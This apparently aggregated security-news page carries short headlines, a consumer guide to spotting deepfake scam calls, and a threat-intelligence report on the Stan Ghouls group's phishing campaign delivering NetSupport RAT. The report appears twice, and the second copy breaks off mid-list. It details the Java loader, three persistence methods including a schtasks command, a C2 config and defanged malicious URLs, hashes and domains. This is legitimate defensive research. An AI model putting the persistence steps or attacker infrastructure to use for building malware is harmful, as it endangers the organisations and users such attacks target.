Normal view

Living off the AI: The Next Evolution of Attacker Tradecraft

6 February 2026 at 13:00

Living off the AI isn’t a hypothetical but a natural continuation of the tradecraft we’ve all been defending against, now mapped onto assistants, agents, and MCP.

The post Living off the AI: The Next Evolution of Attacker Tradecraft appeared first on SecurityWeek.

Airrived Emerges From Stealth With $6.1 Million in Funding

6 February 2026 at 10:40

The startup aims to unify SOC, GRC, IAM, vulnerability management, IT, and business operations through its Agentic OS platform.

The post Airrived Emerges From Stealth With $6.1 Million in Funding appeared first on SecurityWeek.

How to protect yourself from deepfake scammers and save your money | Kaspersky official blog

6 February 2026 at 12:41

Technologies for creating fake video and voice messages are accessible to anyone these days, and scammers are busy mastering the art of deepfakes. No one is immune to the threat — modern neural networks can clone a person’s voice from just three to five seconds of audio, and create highly convincing videos from a couple of photos. We’ve previously discussed how to distinguish a real photo or video from a fake and trace its origin to when it was taken or generated. Now let’s take a look at how attackers create and use deepfakes in real time, how to spot a fake without forensic tools, and how to protect yourself and loved ones from “clone attacks”.

How deepfakes are made

Scammers gather source material for deepfakes from open sources: webinars, public videos on social networks and channels, and online speeches. Sometimes they simply call identity theft targets and keep them on the line for as long as possible to collect data for maximum-quality voice cloning. And hacking the messaging account of someone who loves voice and video messages is the ultimate jackpot for scammers. With access to video recordings and voice messages, they can generate realistic fakes that 95% of folks are unable to tell apart from real messages from friends or colleagues.

The tools for creating deepfakes vary widely, from simple Telegram bots to professional generators like HeyGen and ElevenLabs. Scammers use deepfakes together with social engineering: for example, they might first simulate a messenger app call that appears to drop out constantly, then send a pre-generated video message of fairly low quality, blaming it on the supposedly poor connection.

In most cases, the message is about some kind of emergency in which the deepfake victim requires immediate help. Naturally the “friend in need” is desperate for money, but, as luck would have it, they’ve no access to an ATM, or have lost their wallet, and the bad connection rules out an online transfer. The solution is, of course, to send the money not directly to the “friend”, but to a fake account, phone number, or cryptowallet.

Such scams often involve pre-generated videos, but of late real-time deepfake streaming services have come into play. Among other things, these allow users to substitute their own face in a chat-roulette or video call.

How to recognize a deepfake

If you see a familiar face on the screen together with a recognizable voice but are asked unusual questions, chances are it’s a deepfake scam. Fortunately, there are certain visual, auditory, and behavioral signs that can help even non-techies to spot a fake.

Visual signs of a deepfake

Lighting and shadow issues. Deepfakes often ignore the physics of light: the direction of shadows on the face and in the background may not match, and glares on the skin may look unnatural or not be there at all. Or the person in the video may be half-turned toward the window, but their face is lit by studio lighting. This example will be familiar to participants in video conferences, where substituted background images can appear extremely unnatural.

Blurred or floating facial features. Pay attention to the hairline: deepfakes often show blurring, flickering, or unnatural color transitions along this area. These artifacts are caused by flaws in the algorithm for superimposing the cloned face onto the original.

Unnaturally blinking or “dead” eyes. A person blinks on average 10 to 20 times per minute. Some deepfakes blink too rarely, others too often. Eyelid movements can be too abrupt, and sometimes blinking is out of sync, with one eye not matching the other. “Glassy” or “dead-eye” stares are also characteristic of deepfakes. And sometimes a pupil (usually just the one) may twitch randomly due to a neural network hallucination.

When analyzing a static image such as a photograph, it’s also a good idea to zoom in on the eyes and compare the reflections on the irises — in real photos they’ll be identical; in deepfakes — often not.

How to recognize a deepfake: different specular highlights in the eyes in the image on the right reveal a fake

Look at the reflections and glares in the eyes in the real photo (left) and the generated image (right) — although similar, specular highlights in the eyes in the deepfake are different. Source

Lip-syncing issues. Even top-quality deepfakes trip up when it comes to synchronizing speech with lip movements. A delay of just a hundred milliseconds is noticeable to the naked eye. It’s often possible to observe an irregular lip shape when pronouncing the sounds m, f, or t. All of these are telltale signs of an AI-modeled face.

Static or blurred background. In generated videos, the background often looks unrealistic: it might be too blurry; its elements may not interact with the on-screen face; or sometimes the image behind the person remains motionless even when the camera moves.

Odd facial expressions. Deepfakes do a poor job of imitating emotion: facial expressions may not change in line with the conversation; smiles look frozen, and the fine wrinkles and folds that appear in real faces when expressing emotion are absent — the fake looks botoxed.

Auditory signs of a deepfake

Early AI generators modeled speech from small, monotonous phonemes, and when the intonation changed, there was an audible shift in pitch, making it easy to recognize a synthesized voice. Although today’s technology has advanced far beyond this, there are other signs that still give away generated voices.

Wooden or electronic tone. If the voice sounds unusually flat, without natural intonation variations, or there’s a vaguely electronic quality to it, there’s a high probability you’re talking to a deepfake. Real speech contains many variations in tone and natural imperfections.

No breathing sounds. Humans take micropauses and breathe in between phrases — especially in long sentences, not to mention small coughs and sniffs. Synthetic voices often lack these nuances, or place them unnaturally.

Robotic speech or sudden breaks. The voice may abruptly cut off, words may sound “glued” together, and the stress and intonation may not be what you’re used to hearing from your friend or colleague.

Lack of… shibboleths in speech. Pay attention to speech patterns (such as accent or phrases) that are typical of the person in real life but are poorly imitated (if at all) by the deepfake.

To mask visual and auditory artifacts, scammers often simulate poor connectivity by sending a noisy video or audio message. A low-quality video stream or media file is the first red flag indicating that checks are needed of the person at the other end.

Behavioral signs of a deepfake

Analyzing the movements and behavioral nuances of the caller is perhaps still the most reliable way to spot a deepfake in real time.

Can’t turn their head. During the video call, ask the person to turn their head so they’re looking completely to the side. Most deepfakes are created using portrait photos and videos, so a sideways turn will cause the image to float, distort, or even break up. AI startup Metaphysic.ai — creators of viral Tom Cruise deepfakes — confirm that head rotation is the most reliable deepfake test at present.

Unnatural gestures. Ask the on-screen person to perform a spontaneous action: wave their hand in front of their face; scratch their nose; take a sip from a cup; cover their eyes with their hands; or point to something in the room. Deepfakes have trouble handling impromptu gestures — hands may pass ghostlike through objects or the face, or fingers may appear distorted, or move unnaturally.

How to spot a deepfake: when a deepfake hand is waved in front of a deepfake face, they merge together

Ask a deepfake to wave a hand in front of its face, and the hand may appear to dissolve. Source

Screen sharing. If the conversation is work-related, ask your chat partner to share their screen and show an on-topic file or document. Without access to your real-life colleague’s device, this will be virtually impossible to fake.

Can’t answer tricky questions. Ask something that only the genuine article could know, for example: “What meeting do we have at work tomorrow?”, “Where did I get this scar?”, “Where did we go on vacation two years ago?” A scammer won’t be able to answer questions if the answers aren’t present in the hacked chats or publicly available sources.

Don’t know the codeword. Agree with friends and family on a secret word or phrase for emergency use to confirm identity. If a panicked relative asks you to urgently transfer money, ask them for the family codeword. A flesh-and-blood relation will reel it off; a deepfake-armed fraudster won’t.

What to do if you encounter a deepfake

If you’ve even the slightest suspicion that what you’re talking to isn’t a real human but a deepfake, follow our tips below.

  • End the chat and call back. The surest check is to end the video call and connect with the person through another channel: call or text their regular phone, or message them in another app. If your opposite number is unhappy about this, pretend the connection dropped out.
  • Don’t be pressured into sending money. A favorite trick is to create a false sense of urgency. “Mom, I need money right now, I’ve had an accident”; “I don’t have time to explain”; “If you don’t send it in ten minutes, I’m done for!” A real person usually won’t mind waiting a few extra minutes while you double-check the information.
  • Tell your friend or colleague they’ve been hacked. If a call or message from someone in your contacts comes from a new number or an unfamiliar account, it’s not unusual — attackers often create fake profiles or use temporary numbers, and this is yet another red flag. But if you get a deepfake call from a contact in a messenger app or your address book, inform them immediately that their account has been hacked — and do it via another communication channel. This will help them take steps to regain access to their account (see our detailed instructions for Telegram and WhatsApp), and to minimize potential damage to other contacts, for example, by posting about the hack.

How to stop your own face getting deepfaked

  • Restrict public access to your photos and videos. Hide your social media profiles from strangers, limit your friends list to real people, and delete videos with your voice and face from public access.
  • Don’t give suspicious apps access to your smartphone camera or microphone. Scammers can collect biometric data through fake apps disguised as games or utilities. To stop such programs from getting on your devices, use a proven all-in-one security solution.
  • Use passkeys, unique passwords, and two-factor authentication (2FA) where possible. Even if scammers do create a deepfake with your face, 2FA will make it much harder to access your accounts and use them to send deepfakes. A cross-platform password manager with support for passkeys and 2FA codes can help out here.
  • Teach friends and family how to spot deepfakes. Elderly relatives, young children, and anyone new to technology are the most vulnerable targets. Educate them about scams, show them examples of deepfakes, and practice using a family codeword.
  • Use content analyzers. While there’s no silver bullet against deepfakes, there are services that can identify AI-generated content with high accuracy. For graphics, these include Undetectable AI and Illuminarty; for video — Deepware; and for all types of deepfakes — Sensity AI and Hive Moderation.
  • Keep a cool head. Scammers apply psychological pressure to hurry victims into acting rashly. Remember the golden rule: if a call, video, or voice message from anyone you know rouses even the slightest suspicion, end the conversation and make contact through another channel.

To protect yourself and loved ones from being scammed, learn more about how scammers deploy deepfakes:

Researchers Expose Network of 150 Cloned Law Firm Websites in AI-Powered Scam Campaign

5 February 2026 at 15:00

Criminals are using AI to clone professional websites at an industrial scale. A new report shows how one AI-powered network grew to 150+ domains by hiding behind Cloudflare and rotating IP ranges.

The post Researchers Expose Network of 150 Cloned Law Firm Websites in AI-Powered Scam Campaign appeared first on SecurityWeek.

Critical N8n Sandbox Escape Could Lead to Server Compromise

5 February 2026 at 12:23

The vulnerability could allow attackers to execute arbitrary commands and steal credentials and other secrets.

The post Critical N8n Sandbox Escape Could Lead to Server Compromise appeared first on SecurityWeek.

Stan Ghouls targeting Russia and Uzbekistan with NetSupport RAT

5 February 2026 at 10:00

Introduction

Stan Ghouls (also known as Bloody Wolf) is an cybercriminal group that has been launching targeted attacks against organizations in Russia, Kyrgyzstan, Kazakhstan, and Uzbekistan since at least 2023. These attackers primarily have their sights set on the manufacturing, finance, and IT sectors. Their campaigns are meticulously prepared and tailored to specific victims, featuring a signature toolkit of custom Java-based malware loaders and a sprawling infrastructure with resources dedicated to specific campaigns.

We continuously track Stan Ghouls’ activity, providing our clients with intel on their tactics, techniques, procedures, and latest campaigns. In this post, we share the results of our most recent deep dive into a campaign targeting Uzbekistan, where we identified roughly 50 victims. About 10 devices in Russia were also hit, with a handful of others scattered across Kazakhstan, Turkey, Serbia, and Belarus (though those last three were likely just collateral damage).

During our investigation, we spotted shifts in the attackers’ infrastructure – specifically, a batch of new domains. We also uncovered evidence suggesting that Stan Ghouls may have added IoT-focused malware to their arsenal.

Technical details

Threat evolution

Stan Ghouls relies on phishing emails packed with malicious PDF attachments as their initial entry point. Historically, the group’s weapon of choice was the remote access Trojan (RAT) STRRAT, also known as Strigoi Master. Last year, however, they switched strategies, opting to misuse legitimate software, NetSupport, to maintain control over infected machines.

Given Stan Ghouls’ targeting of financial institutions, we believe their primary motive is financial gain. That said, their heavy use of RATs may also hint at cyberespionage.

Like any other organized cybercrime groups, Stan Ghouls frequently refreshes its infrastructure. To track their campaigns effectively, you have to continuously analyze their activity.

Initial infection vector

As we’ve mentioned, Stan Ghouls’ primary – and currently only – delivery method is spear phishing. Specifically, they favor emails loaded with malicious PDF attachments. This has been backed up by research from several of our industry peers (1, 2, 3). Interestingly, the attackers prefer to use local languages rather than opting for international mainstays like Russian or English. Below is an example of an email spotted in a previous campaign targeting users in Kyrgyzstan.

Example of a phishing email from a previous Stan Ghouls campaign

Example of a phishing email from a previous Stan Ghouls campaign

The email is written in Kyrgyz and translates to: “The service has contacted you. Materials for review are attached. Sincerely”.

The attachment was a malicious PDF file titled “Постановление_Районный_суд_Кчрм_3566_28-01-25_OL4_scan.pdf” (the title, written in Russian, posed it as an order of district court).

During the most recent campaign, which primarily targeted victims in Uzbekistan, the attackers deployed spear-phishing emails written in Uzbek:

Example of a spear-phishing email from the latest campaign

Example of a spear-phishing email from the latest campaign

The email text can be translated as follows:

[redacted] AKMALZHON IBROHIMOVICH

You will receive a court notice. Application for retrial. The case is under review by the district court. Judicial Service.

Mustaqillik Street, 147 Uraboshi Village, Quva District.

The attachment, named E-SUD_705306256_ljro_varaqasi.pdf (MD5: 7556e2f5a8f7d7531f28508f718cb83d), is a standard one-page decoy PDF:

The embedded decoy document

The embedded decoy document

Notice that the attackers claim that the “case materials” (which are actually the malicious loader) can only be opened using the Java Runtime Environment.

They even helpfully provide a link for the victim to download and install it from the official website.

The malicious loader

The decoy document contains identical text in both Russian and Uzbek, featuring two links that point to the malicious loader:

  • Uzbek link (“- Ish materiallari 09.12.2025 y”): hxxps://mysoliq-uz[.]com/api/v2/documents/financial/Q4-2025/audited/consolidated/with-notes/financials/reports/annual/2025/tashkent/statistical-statements/
  • Russian link (“- Материалы дела 09.12.2025 г.”): hxxps://my-xb[.]com/api/v2/documents/financial/Q4-2025/audited/consolidated/with-notes/financials/reports/annual/2025/tashkent/statistical-statements/

Both links lead to the exact same JAR file (MD5: 95db93454ec1d581311c832122d21b20).

It’s worth noting that these attackers are constantly updating their infrastructure, registering new domains for every new campaign. In the relatively short history of this threat, we’ve already mapped out over 35 domains tied to Stan Ghouls.

The malicious loader handles three main tasks:

  1. Displaying a fake error message to trick the user into thinking the application can’t run. The message in the screenshot translates to: “This application cannot be run in your OS. Please use another device.”

    Fake error message

    Fake error message

  2. Checking that the number of previous RAT installation attempts is less than three. If the limit is reached, the loader terminates and throws the following error: “Urinishlar chegarasidan oshildi. Boshqa kompyuterni tekshiring.” This translates to: “Attempt limit reached. Try another computer.”

    The limitCheck procedure for verifying the number of RAT download attempts

    The limitCheck procedure for verifying the number of RAT download attempts

  3. Downloading a remote management utility from a malicious domain and saving it to the victim’s machine. Stan Ghouls loaders typically contain a list of several domains and will iterate through them until they find one that’s live.

    The performanceResourceUpdate procedure for downloading the remote management utility

    The performanceResourceUpdate procedure for downloading the remote management utility

The loader fetches the following files, which make up the components of the NetSupport RAT: PCICHEK.DLL, client32.exe, advpack.dll, msvcr100.dll, remcmdstub.exe, ir50_qcx.dll, client32.ini, AudioCapture.dll, kbdlk41a.dll, KBDSF.DLL, tcctl32.dll, HTCTL32.DLL, kbdibm02.DLL, kbd101c.DLL, kbd106n.dll, ir50_32.dll, nskbfltr.inf, NSM.lic, pcicapi.dll, PCICL32.dll, qwave.dll. This list is hardcoded in the malicious loader’s body. To ensure the download was successful, it checks for the presence of the client32.exe executable. If the file is found, the loader generates a NetSupport launch script (run.bat), drops it into the folder with the other files, and executes it:

The createBatAndRun procedure for creating and executing the run.bat file, which then launches the NetSupport RAT

The createBatAndRun procedure for creating and executing the run.bat file, which then launches the NetSupport RAT

The loader also ensures NetSupport persistence by adding it to startup using the following three methods:

  1. It creates an autorun script named SoliqUZ_Run.bat and drops it into the Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup):

    The generateAutorunScript procedure for creating the batch file and placing it in the Startup folder

    The generateAutorunScript procedure for creating the batch file and placing it in the Startup folder

  2. It adds the run.bat file to the registry’s autorun key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malicious_key_name).

    The registryStartupAdd procedure for adding the RAT launch script to the registry autorun key

    The registryStartupAdd procedure for adding the RAT launch script to the registry autorun key

  3. It creates a scheduled task to trigger run.bat using the following command:
    schtasks Create /TN "[malicious_task_name]" /TR "[path_to_run.bat]" /SC ONLOGON /RL LIMITED /F /RU "[%USERNAME%]"

    The installStartupTask procedure for creating a scheduled task to launch the NetSupport RAT (via run.bat)

    The installStartupTask procedure for creating a scheduled task to launch the NetSupport RAT (via run.bat)

Once the NetSupport RAT is downloaded, installed, and executed, the attackers gain total control over the victim’s machine. While we don’t have enough telemetry to say with 100% certainty what they do once they’re in, the heavy focus on finance-related organizations suggests that the group is primarily after its victims’ money. That said, we can’t rule out cyberespionage either.

Malicious utilities for targeting IoT infrastructure

Previous Stan Ghouls attacks targeting organizations in Kyrgyzstan, as documented by Group-IB researchers, featured a NetSupport RAT configuration file client32.ini with the MD5 hash cb9c28a4c6657ae5ea810020cb214ff0. While reports mention the Kyrgyzstan campaign kicked off in June 2025, Kaspersky solutions first flagged this exact config file on May 16, 2025. At that time, it contained the following NetSupport RAT command-and-control server info:

...
[HTTP]
CMPI=60
GatewayAddress=hgame33[.]com:443
GSK=FN:L?ADAFI:F?BCPGD;N>IAO9J>J@N
Port=443
SecondaryGateway=ravinads[.]com:443
SecondaryPort=443

At the time of our January 2026 investigation, our telemetry showed that the domain specified in that config, hgame33[.]com, was also hosting the following files:

  • hxxp://www.hgame33[.]com/00101010101001/morte.spc
  • hxxp://hgame33[.]com/00101010101001/debug
  • hxxp://www.hgame33[.]com/00101010101001/morte.x86
  • hxxp://www.hgame33[.]com/00101010101001/morte.mpsl
  • hxxp://www.hgame33[.]com/00101010101001/morte.arm7
  • hxxp://www.hgame33[.]com/00101010101001/morte.sh4
  • hxxp://hgame33[.]com/00101010101001/morte.arm
  • hxxp://hgame33[.]com/00101010101001/morte.i686
  • hxxp://hgame33[.]com/00101010101001/morte.arc
  • hxxp://hgame33[.]com/00101010101001/morte.arm5
  • hxxp://hgame33[.]com/00101010101001/morte.arm6
  • hxxp://www.hgame33[.]com/00101010101001/morte.m68k
  • hxxp://www.hgame33[.]com/00101010101001/morte.ppc
  • hxxp://www.hgame33[.]com/00101010101001/morte.x86_64
  • hxxp://hgame33[.]com/00101010101001/morte.mips

All of these files belong to the infamous IoT malware named Mirai. Since they are sitting on a server tied to the Stan Ghouls’ campaign targeting Kyrgyzstan, we can hypothesize – with a low degree of confidence – that the group has expanded its toolkit to include IoT-based threats. However, it’s also possible it simply shared its infrastructure with other threat actors who were the ones actually wielding Mirai. This theory is backed up by the fact that the domain’s registration info was last updated on July 4, 2025, at 11:46:11 – well after Stan Ghouls’ activity in May and June.

Attribution

We attribute this campaign to the Stan Ghouls (Bloody Wolf) group with a high degree of confidence, based on the following similarities to the attackers’ previous campaigns:

  1. Substantial code overlaps were found within the malicious loaders. For example:
    Code snippet from sample 1acd4592a4eb0c66642cc7b07213e9c9584c6140210779fbc9ebb76a90738d5e, the loader from the Group-IB report

    Code snippet from sample 1acd4592a4eb0c66642cc7b07213e9c9584c6140210779fbc9ebb76a90738d5e, the loader from the Group-IB report

    Code snippet from sample 95db93454ec1d581311c832122d21b20, the NetSupport loader described here

    Code snippet from sample 95db93454ec1d581311c832122d21b20, the NetSupport loader described here

  2. Decoy documents in both campaigns look identical.
    Decoy document 5d840b741d1061d51d9786f8009c37038c395c129bee608616740141f3b202bb from the campaign reported by Group-IB

    Decoy document 5d840b741d1061d51d9786f8009c37038c395c129bee608616740141f3b202bb from the campaign reported by Group-IB

    Decoy document 106911ba54f7e5e609c702504e69c89a used in the campaign described here

    Decoy document 106911ba54f7e5e609c702504e69c89a used in the campaign described here

  3. In both current and past campaigns, the attackers utilized loaders written in Java. Given that Java has fallen out of fashion with malicious loader authors in recent years, it serves as a distinct fingerprint for Stan Ghouls.

Victims

We identified approximately 50 victims of this campaign in Uzbekistan, alongside 10 in Russia and a handful of others in Kazakhstan, Turkey, Serbia, and Belarus (we suspect the infections in these last three countries were accidental). Nearly all phishing emails and decoy files in this campaign were written in Uzbek, which aligns with the group’s track record of leveraging the native languages of their target countries.

Most of the victims are tied to industrial manufacturing, finance, and IT. Furthermore, we observed infection attempts on devices within government organizations, logistics companies, medical facilities, and educational institutions.

It is worth noting that over 60 victims is quite a high headcount for a sophisticated campaign. This suggests the attackers have enough resources to maintain manual remote control over dozens of infected devices simultaneously.

Takeaways

In this post, we’ve broken down the recent campaign by the Stan Ghouls group. The attackers set their sights on organizations in industrial manufacturing, IT, and finance, primarily located in Uzbekistan. However, the ripple effect also reached Russia, Kazakhstan, and a few, likely accidental, victims elsewhere.

With over 60 targets hit, this is a remarkably high volume for a sophisticated targeted campaign. It points to the significant resources these actors are willing to pour into their operations. Interestingly, despite this, the group sticks to a familiar toolkit including the legitimate NetSupport remote management utility and their signature custom Java-based loader. The only thing they seem to keep updating is their infrastructure. For this specific campaign, they employed two new domains to house their malicious loader and one new domain dedicated to hosting NetSupport RAT files.

One curious discovery was the presence of Mirai files on a domain linked to the group’s previous campaigns. This might suggest Stan Ghouls are branching out into IoT malware, though it’s still too early to call it with total certainty.

We’re keeping a close watch on Stan Ghouls and will continue to keep our customers in the loop regarding the group’s latest moves. Kaspersky products provide robust protection against this threat at every stage of the attack lifecycle.

Indicators of compromise

* Additional IoCs and a YARA rule for detecting Stan Ghouls activity are available to customers of our Threat Intelligence Reporting service. For more details, contact us at crimewareintel@kaspersky.com.

PDF decoys

B4FF4AA3EBA9409F9F1A5210C95DC5C3
AF9321DDB4BEF0C3CD1FF3C7C786F0E2
056B75FE0D230E6FF53AC508E0F93CCB
DB84FEBFD85F1469C28B4ED70AC6A638
649C7CACDD545E30D015EDB9FCAB3A0C
BE0C87A83267F1CE13B3F75C78EAC295
78CB3ABD00A1975BEBEDA852B2450873
51703911DC437D4E3910CE7F866C970E
FA53B0FCEF08F8FF3FFDDFEE7F1F4F1A
79D0EEAFB30AA2BD4C261A51104F6ACC
8DA8F0339D17E2466B3D73236D18B835
299A7E3D6118AD91A9B6D37F94AC685B
62AFACC37B71D564D75A58FC161900C3
047A600E3AFBF4286175BADD4D88F131
ED0CCADA1FE1E13EF78553A48260D932
C363CD87178FD660C25CDD8D978685F6
61FF22BA4C3DF7AE4A936FCFDEB020EA
B51D9EDC1DC8B6200F260589A4300009
923557554730247D37E782DB3BEA365D
60C34AD7E1F183A973FB8EE29DC454E8
0CC80A24841401529EC9C6A845609775
0CE06C962E07E63D780E5C2777A661FC

Malicious loaders

1b740b17e53c4daeed45148bfbee4f14
3f99fed688c51977b122789a094fec2e
8b0bbe7dc960f7185c330baa3d9b214c
95db93454ec1d581311c832122d21b20
646a680856f837254e6e361857458e17
8064f7ac9a5aa845ded6a1100a1d5752
d0cf8946acd3d12df1e8ae4bb34f1a6e
db796d87acb7d980264fdcf5e94757f0
e3cb4dafa1fb596e1e34e4b139be1b05
e0023eb058b0c82585a7340b6ed4cc06
0bf01810201004dcc484b3396607a483
4C4FA06BD840405FBEC34FE49D759E8D
A539A07891A339479C596BABE3060EA6
b13f7ccbedfb71b0211c14afe0815b36
f14275f8f420afd0f9a62f3992860d68
3f41091afd6256701dd70ac20c1c79fe
5c4a57e2e40049f8e8a6a74aa8085c80
7e8feb501885eff246d4cb43c468b411
8aa104e64b00b049264dc1b01412e6d9
8c63818261735ddff2fe98b3ae23bf7d

Malicious domains

mysoliq-uz[.]com
my-xb[.]com
xarid-uz[.]com
ach-uz[.]com
soliq-uz[.]com
minjust-kg[.]com
esf-kg[.]com
taxnotice-kg[.]com
notice-kg[.]com
proauditkg[.]com
kgauditcheck[.]com
servicedoc-kg[.]com
auditnotice-kg[.]com
tax-kg[.]com
rouming-uz[.]com
audit-kg[.]com
kyrgyzstanreview[.]com
salyk-notofocations[.]com

Stan Ghouls targeting Russia and Uzbekistan with NetSupport RAT

5 February 2026 at 10:00

Introduction

Stan Ghouls (also known as Bloody Wolf) is an cybercriminal group that has been launching targeted attacks against organizations in Russia, Kyrgyzstan, Kazakhstan, and Uzbekistan since at least 2023. These attackers primarily have their sights set on the manufacturing, finance, and IT sectors. Their campaigns are meticulously prepared and tailored to specific victims, featuring a signature toolkit of custom Java-based malware loaders and a sprawling infrastructure with resources dedicated to specific campaigns.

We continuously track Stan Ghouls’ activity, providing our clients with intel on their tactics, techniques, procedures, and latest campaigns. In this post, we share the results of our most recent deep dive into a campaign targeting Uzbekistan, where we identified roughly 50 victims. About 10 devices in Russia were also hit, with a handful of others scattered across Kazakhstan, Turkey, Serbia, and Belarus (though those last three were likely just collateral damage).

During our investigation, we spotted shifts in the attackers’ infrastructure – specifically, a batch of new domains. We also uncovered evidence suggesting that Stan Ghouls may have added IoT-focused malware to their arsenal.

Technical details

Threat evolution

Stan Ghouls relies on phishing emails packed with malicious PDF attachments as their initial entry point. Historically, the group’s weapon of choice was the remote access Trojan (RAT) STRRAT, also known as Strigoi Master. Last year, however, they switched strategies, opting to misuse legitimate software, NetSupport, to maintain control over infected machines.

Given Stan Ghouls’ targeting of financial institutions, we believe their primary motive is financial gain. That said, their heavy use of RATs may also hint at cyberespionage.

Like any other organized cybercrime groups, Stan Ghouls frequently refreshes its infrastructure. To track their campaigns effectively, you have to continuously analyze their activity.

Initial infection vector

As we’ve mentioned, Stan Ghouls’ primary – and currently only – delivery method is spear phishing. Specifically, they favor emails loaded with malicious PDF attachments. This has been backed up by research from several of our industry peers (1, 2, 3). Interestingly, the attackers prefer to use local languages rather than opting for international mainstays like Russian or English. Below is an example of an email spotted in a previous campaign targeting users in Kyrgyzstan.

Example of a phishing email from a previous Stan Ghouls campaign

Example of a phishing email from a previous Stan Ghouls campaign

The email is written in Kyrgyz and translates to: “The service has contacted you. Materials for review are attached. Sincerely”.

The attachment was a malicious PDF file titled “Постановление_Районный_суд_Кчрм_3566_28-01-25_OL4_scan.pdf” (the title, written in Russian, posed it as an order of district court).

During the most recent campaign, which primarily targeted victims in Uzbekistan, the attackers deployed spear-phishing emails written in Uzbek:

Example of a spear-phishing email from the latest campaign

Example of a spear-phishing email from the latest campaign

The email text can be translated as follows:

[redacted] AKMALZHON IBROHIMOVICH

You will receive a court notice. Application for retrial. The case is under review by the district court. Judicial Service.

Mustaqillik Street, 147 Uraboshi Village, Quva District.

The attachment, named E-SUD_705306256_ljro_varaqasi.pdf (MD5: 7556e2f5a8f7d7531f28508f718cb83d), is a standard one-page decoy PDF:

The embedded decoy document

The embedded decoy document

Notice that the attackers claim that the “case materials” (which are actually the malicious loader) can only be opened using the Java Runtime Environment.

They even helpfully provide a link for the victim to download and install it from the official website.

The malicious loader

The decoy document contains identical text in both Russian and Uzbek, featuring two links that point to the malicious loader:

  • Uzbek link (“- Ish materiallari 09.12.2025 y”): hxxps://mysoliq-uz[.]com/api/v2/documents/financial/Q4-2025/audited/consolidated/with-notes/financials/reports/annual/2025/tashkent/statistical-statements/
  • Russian link (“- Материалы дела 09.12.2025 г.”): hxxps://my-xb[.]com/api/v2/documents/financial/Q4-2025/audited/consolidated/with-notes/financials/reports/annual/2025/tashkent/statistical-statements/

Both links lead to the exact same JAR file (MD5: 95db93454ec1d581311c832122d21b20).

It’s worth noting that these attackers are constantly updating their infrastructure, registering new domains for every new campaign. In the relatively short history of this threat, we’ve already mapped out over 35 domains tied to Stan Ghouls.

The malicious loader handles three main tasks:

  1. Displaying a fake error message to trick the user into thinking the application can’t run. The message in the screenshot translates to: “This application cannot be run in your OS. Please use another device.”

    Fake error message

    Fake error message

  2. Checking that the number of previous RAT installation attempts is less than three. If the limit is reached, the loader terminates and throws the following error: “Urinishlar chegarasidan oshildi. Boshqa kompyuterni tekshiring.” This translates to: “Attempt limit reached. Try another computer.”

    The limitCheck procedure for verifying the number of RAT download attempts

    The limitCheck procedure for verifying the number of RAT download attempts

  3. Downloading a remote management utility from a malicious domain and saving it to the victim’s machine. Stan Ghouls loaders typically contain a list of several domains and will iterate through them until they find one that’s live.

    The performanceResourceUpdate procedure for downloading the remote management utility

    The performanceResourceUpdate procedure for downloading the remote management utility

The loader fetches the following files, which make up the components of the NetSupport RAT: PCICHEK.DLL, client32.exe, advpack.dll, msvcr100.dll, remcmdstub.exe, ir50_qcx.dll, client32.ini, AudioCapture.dll, kbdlk41a.dll, KBDSF.DLL, tcctl32.dll, HTCTL32.DLL, kbdibm02.DLL, kbd101c.DLL, kbd106n.dll, ir50_32.dll, nskbfltr.inf, NSM.lic, pcicapi.dll, PCICL32.dll, qwave.dll. This list is hardcoded in the malicious loader’s body. To ensure the download was successful, it checks for the presence of the client32.exe executable. If the file is found, the loader generates a NetSupport launch script (run.bat), drops it into the folder with the other files, and executes it:

The createBatAndRun procedure for creating and executing the run.bat file, which then launches the NetSupport RAT

The createBatAndRun procedure for creating and executing the run.bat file, which then launches the NetSupport RAT

The loader also ensures NetSupport persistence by adding it to startup using the following three methods:

  1. It creates an autorun script named SoliqUZ_Run.bat and drops it into the Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup):

    The generateAutorunScript procedure for creating the batch file and placing it in the Startup folder

    The generateAutorunScript procedure for creating the batch file and placing it in the Startup folder

  2. It adds the run.bat file to the registry’s autorun key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malicious_key_name).

    The registryStartupAdd procedure for adding the RAT launch script to the registry autorun key

    The registryStartupAdd procedure for adding the RAT launch script to the registry autorun key

  3. It creates a scheduled task to trigger run.bat using the following command:
    schtasks Create /TN "[malicious_task_name]" /TR "[path_to_run.bat]" /SC ONLOGON /RL LIMITED /F /RU "[%USERNAME%]"

    The installStartupTask procedure for creating a scheduled task to launch the NetSupport RAT (via run.bat)

    The installStartupTask procedure for creating a scheduled task to launch the NetSupport RAT (via run.bat)

Once the NetSupport RAT is downloaded, installed, and executed, the attackers gain total control over the victim’s machine. While we don’t have enough telemetry to say with 100% certainty what they do once they’re in, the heavy focus on finance-related organizations suggests that the group is primarily after its victims’ money. That said, we can’t rule out cyberespionage either.

Malicious utilities for targeting IoT infrastructure

Previous Stan Ghouls attacks targeting organizations in Kyrgyzstan, as documented by Group-IB researchers, featured a NetSupport RAT configuration file client32.ini with the MD5 hash cb9c28a4c6657ae5ea810020cb214ff0. While reports mention the Kyrgyzstan campaign kicked off in June 2025, Kaspersky solutions first flagged this exact config file on May 16, 2025. At that time, it contained the following NetSupport RAT command-and-control server info:

...
[HTTP]
CMPI=60
GatewayAddress=hgame33[.]com:443
GSK=FN:L?ADAFI:F?BCPGD;N>IAO9J>J@N
Port=443
SecondaryGateway=ravinads[.]com:443
SecondaryPort=443

At the time of our January 2026 investigation, our telemetry showed that the domain specified in that config, hgame33[.]com, was also hosting the following files:

  • hxxp://www.hgame33[.]com/00101010101001/morte.spc
  • hxxp://hgame33[.]com/00101010101001/debug
  • hxxp://www.hgame33[.]com/00101010101001/morte.x86
  • hxxp://www.hgame33[.]com/00101010101001/morte.mpsl
  • hxxp://www.hgame33[.]com/00101010101001/morte.arm7
  • hxxp://www.hgame33[.]com/00101010101001/morte.sh4
  • hxxp://hgame33[.]com/00101010101001/morte.arm
  • hxxp://hgame33[.]com/00101010101001/morte.i686
  • hxxp://hgame33[.]com/00101010101001/morte.arc
  • hxxp://hgame33[.]com/00101010101001/morte.arm5
  • hxxp://hgame33[.]com/00101010101001/morte.arm6
  • hxxp://www.hgame33[.]com/00101010101001/morte.m68k
  • hxxp://www.hgame33[.]com/00101010101001/morte.ppc
  • hxxp://www.hgame33[.]com/00101010101001/morte.x86_64
